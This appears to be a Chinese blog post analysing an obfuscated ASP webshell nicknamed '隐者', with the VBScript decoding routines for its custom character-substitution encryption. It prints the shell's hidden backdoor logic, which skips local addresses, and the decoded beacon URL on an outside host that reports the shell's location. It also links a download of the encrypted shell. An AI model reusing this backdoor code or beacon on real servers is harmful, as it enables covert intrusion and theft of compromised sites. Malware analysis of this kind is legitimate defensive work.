vbscript.encode解密后代码的自定义加密全是用汉字“隐者”来加密的就叫这个shell为隐者webshell了,
先上图看真容
一个感觉是这个shell解密很漂亮,还是挺顺眼的。
解密首先是反编windows script encode了,之后得到自定义解密,都很简单,不多说了。
加密方式有2个
十三的加密
Function ShiSanFun(ShiSanObjstr)
ShiSanObjstr = Replace(ShiSanObjstr, “者”, “”””):For ShiSanI = 1 To Len(ShiSanObjstr):If Mid(ShiSanObjstr, ShiSanI, 1) <> “隐” Then
ShiSanNewStr = Mid(ShiSanObjstr, ShiSanI, 1) & ShiSanNewStr
Else:ShiSanNewStr = vbCrLf & ShiSanNewStr
End If:Next:ShiSanFun = ShiSanNewStr:End Function
黑客伟的加密
Function UZSS(objstr)
objstr = Replace(objstr, “隐”, “”””):For i = 1 To Len(objstr):If Mid(objstr, i, 1) <> “者” Then
NewStr = Mid(objstr, i, 1) & NewStr
Else
NewStr = vbCrLf & NewStr
End If:Next:UZSS = NewStr:End Function
都分别解密之。
下面看下后门,和以前的后门方式一样
if Instr(Serveru,”127.0.0.1″)<>0 or Instr(Serveru,”192.168.”)<>0 or Instr(Serveru,””&posurl&”://”)<>0 then
else:if session(“servec”)=1 then
session(“servec”)=session(“servec”)+1
RRS””
else
if Action<>“” then session(“servec”)=session(“servec”)+1
end if
end if
end if在本地测试,后门地址解开是:http://188dl.com/k/y.asp?u=localhost/test.asp&p=1
附件中为加密版本
点击下载此文件
最开始出于共享的目的,发布了解密的源码,但是很多朋友劝说我,那么解密文件就不发布了。